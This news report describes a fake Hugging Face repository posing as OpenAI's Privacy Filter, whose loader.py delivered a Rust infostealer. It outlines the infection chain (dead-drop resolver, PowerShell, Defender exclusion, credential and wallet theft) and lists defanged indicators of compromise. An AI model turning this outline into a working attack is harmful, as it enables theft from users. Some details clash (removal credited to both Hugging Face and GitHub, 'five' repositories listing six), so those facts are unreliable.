10.05.2026
4 min
188
A fake repository was discovered on the Hugging Face platform, posing as an official AI tool from OpenAI. In less than a day, it became a top trending site and gained about 244,000 downloads, while simultaneously infecting Windows systems with data-stealing malware.
A phishing repository had successfully climbed to the No.1 spot on the Hugging Face Trend list by using a very similar name and description of a new “Privacy Filter” from Open AI which was recently published in late April 2026.
This repository contained a malicious Rust-based info-stealer which targeted Windows users, stealing their passwords, cryptocurrency wallets & seed phrases, Discord tokens & all other personally identifiable information.
The attacker simply cloned the original legitimate repository and copied everything including the model cards and documentation into a new malicious repository. They even copied the same model description, model architecture and documentation from the original repository. When this attack was found out, Hugging Face removed the malicious repository.
The Privacy Filter is an open-weight model that has been developed by Open AI for detecting & removing private data within unstructured text. This is a part of Open AI’s vision to develop tools for better protecting privacy within AI systems and hide information such as email addresses, phone numbers, etc.
As reported by Hidden Layer the malicious repository included a python file named loader.py. The purpose of loader.py is to download and execute malware on Windows-based operating systems.
“…the repository incorrectly used Open AI’s legitimate release of their Privacy Filter. Almost all of their model card was identical and they included a loader.py file that will fetch & execute the infostealer malware on windows computers when you run it” said Hidden Layer researchers.
When users ran the start.bat file in Windows or loader.py in Linux/MacOS, the users would be instructed to “clone” the repository first then run the loader.py file. Once loaded, the loader.py would initiate an infection chain.
Once initiated, the loader.py would disable ssl verification and make a call to the JSONKeeper service. The JSONKeeper service would send back an encoded base64 address and pass it onto a powershell command where additional actions can be taken.
Using JSONKeeper as a dead-drop resolver allows attackers to easily update payloads without having to update the repository themselves.
Once completed, the loader.py would download a bat-file from the api.eth-fastscan[.]org domain and execute it with cmd.exe.
During the second stage of infection the bat-script would elevate privileges via uac and add an exception for microsoft defender. Then it would download the next payload and schedule a task to run it.
At the end of its execution cycle, the bat-script deletes itself after 2 seconds.
Finally the last payload would be an rust-based info-stealer which would steal:
– user discord data
– user cryptocurrency wallets and seed phrases
– user browser cookie & password
– Filezilla configuration files
– System Information
– Chromium and Gecko browser data
HiddenLayer also stated that the malware does not have persistent behavior. Only one scheduled task runs under SYSTEM account; and then deletes itself before restarting.
When the repository was eventually blocked by GitHub, it had accumulated approximately 244,000 download records and 667 “likes” within the first 18 hours of its release. Researchers believe this is likely due to artificially inflating these numbers so as to generate an appearance of popularity and credibility for the project.
HiddenLayer also identified five additional repositories utilizing a very similar python loader: anthfu/Bonsai-8B-gguf anthfu/Qwen3.6-35B-A3B-APEX-GGU anthfu/DeepSeek-V4-Pro anthfu/Qwopus-GLM-18B-Merged-GGUF anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF anthfu/supergemma4-26b-uncensored-gguf-v2
Researchers have additionally determined that the api[.]eth-fastscan[.]org domain has been utilized for other types of malicious activities; it was previously used to distribute the Windows executable (o0q2l47f.exe) and to communicate with the welovechinatown[.]info C2 server. This type of infrastructure has been associated with the distribution of both ValleyRAT and Winos 4.0 via the trevlo npm package.
As Panther described earlier, the malicious npm package launched an obfuscated javascript loader that communicated with the attackers’ infrastructure using base64 encoded powershell commands to launch the next phase of the compromise.
